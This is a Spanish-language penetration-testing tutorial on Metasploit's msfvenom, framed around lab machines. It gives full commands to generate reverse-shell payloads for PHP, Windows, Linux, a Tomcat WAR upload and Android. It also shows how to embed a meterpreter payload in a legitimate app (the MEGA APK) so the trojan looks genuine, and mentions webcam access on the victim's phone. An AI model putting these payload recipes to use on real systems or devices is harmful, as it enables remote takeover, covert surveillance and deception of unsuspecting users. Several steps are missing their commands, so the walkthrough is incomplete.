Msfvenom es una herramienta de línea de comandos que forma parte del framework de pruebas de penetración Metasploit. Se utiliza para generar y personalizar payloads (cargas útiles) maliciosos que pueden ser utilizados en ataques de pruebas de penetración y en la explotación de vulnerabilidades en sistemas informáticos.
Hay dos tipos de payloads, los staged y los non-staged:
Para generar un archivo de reverse shell en PHP utilizando msfvenom, puedes utilizar el siguiente comando:
msfvenom -p php/reverse_php LHOST=<tu dirección IP> LPORT=<tu puerto> -f raw > reverse_shell.php
Una vez que hayas generado el archivo de reverse shell en PHP, puedes transferirlo a la máquina objetivo y ejecutarlo en un servidor web para establecer una conexión de reverse shell con la máquina atacante.
Podemos también generar un payload para entablar una reverse shell en forma de meterpreter en metasploit desde una máquina windows a nuestra máquina atacante, generando el siguiente payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -f exe -o pwned.exe
Una vez generado esto, tenemos que abrir el /multi/handler de metasploit seleccionando como payload el meterpreter:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Y ahora desde la máquina víctima, ejecutamos el script creado anteriormente:
Y recibimos sesión de meterpreter:
Aunque también podemos crear un payload que no sea de meterpreter, sino para recibir una shell normal, haciéndolo de la misma forma:
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
Los ficheros elf en linux se pueden asemejar a los exe de windows, por lo que haremos lo mismo de antes pero para linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.30 LPORT=443 -f elf -o pwned.elf
Lo compartimos con la máquina víctima:
Nos ponemos en la escucha con metasploit usando el payload de meterpreter para linux:
set PAYLOAD linux/x64/meterpreter/reverse_tcp
Ejecutamos el archivo en la máquina víctima y recibimos la conexión:
Estamos ante un servidor tomcat, que por ejemplo se trata de la máquina MAQUINA DEPLOY, donde dentro del puerto 8080 corre un servidor tomcat y se nos muestra que podemos subir un archivo WAR:
msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.37 LPORT=443 -f war -o revshell.war
Lo creamos
Lo subimos y lo tenemos aquí dentro del servidor, donde hacemos clic:
Y recibimos la conexión:
Podemos también crear un payload dentro de un apk y establecer una sesión de meterpreter en metasploit, por tanto usaremos el siguiente comando:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.30 LPORT=443 > virus.apk
Y ahora con metasploit estaremos en la escucha con el multi handler, además de establecer el payload correcto:
set payload android/meterpreter/reverse_tcp
Si la ejecutamos desde un dispositivo android habremos recibido una sesión de meterpreter:
Y podemos acceder a la webcam:
Primero tenemos que instalar apktool en nuestro kali:
Y también nos bajamos la última versión del apktool:
Otorgamos permisos a los 2 archivos:
Movemos los dos archivos al siguiente directorio:
Y dentro del /usr/local/bin tenemos que renombrar el fichero .jar de esta forma:
Y ahora si ejecutamos el apktool debería funcionar bien:
Y ahora instalaremos estos 3 paquetes:
Ahora el siguiente paso será descargar un apk legítima, por ejemplo la de mega:
Y ahora una vez descargado el apk lo pasamos por msfvenom:
msfvenom -x mega.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.36 LPORT=443 -o mega_virus.apk
Lo pasamos al dispositivo android y ahora con metasploit nos ponemos en la escucha:
Nos compartimos el apk con la víctima y con metasploit nos ponemos en la escucha, poniendo este payload:
set payload android/meterpreter/reverse_tcp